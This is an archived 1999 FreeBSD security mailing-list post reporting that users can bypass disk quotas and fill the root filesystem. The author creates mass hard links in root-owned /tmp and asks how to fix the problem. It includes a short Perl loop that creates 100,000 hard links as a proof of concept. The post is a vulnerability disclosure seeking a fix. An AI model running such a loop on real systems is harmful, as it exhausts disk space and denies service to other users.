From owner-freebsd-security  Wed Mar 17  3:43:10 1999
Delivered-To: freebsd-security@freebsd.org
Received: from xkis.kis.ru (xkis.kis.ru [195.98.32.200])
	by hub.freebsd.org (Postfix) with ESMTP
	id 2279815274; Wed, 17 Mar 1999 03:43:05 -0800 (PST)
	(envelope-from dv@dv.ru)
Received: from localhost (dv@localhost)
          by xkis.kis.ru (8.9.0/8.9.0) with SMTP id OAA16894;
          Wed, 17 Mar 1999 14:42:46 +0300 (MSK)
Date: Wed, 17 Mar 1999 14:42:46 +0300 (MSK)
From: Dmitry Valdov <dv@dv.ru>
X-Sender: dv@xkis.kis.ru
To: freebsd-current@freebsd.org, freebsd-security@freebsd.org
Subject: disk quota overriding
Message-ID: <Pine.BSF.3.95q.990317143707.15120A-100000@xkis.kis.ru>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi!

There is a way to overflow / filesystem even is quota is enabled.

Just make many hard links (for example /bin/sh) to /tmp/

for ($q=0;$q<100000;$q++){
system ("ln /bin/sh /tmp/ln$q");
}

Because /tmp directory usually owned by root that why quotas has no effect.
*Directory* size of /tmp can be grown up to available space on / filesystem.

Any way to fix it?

Dmitry.




To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message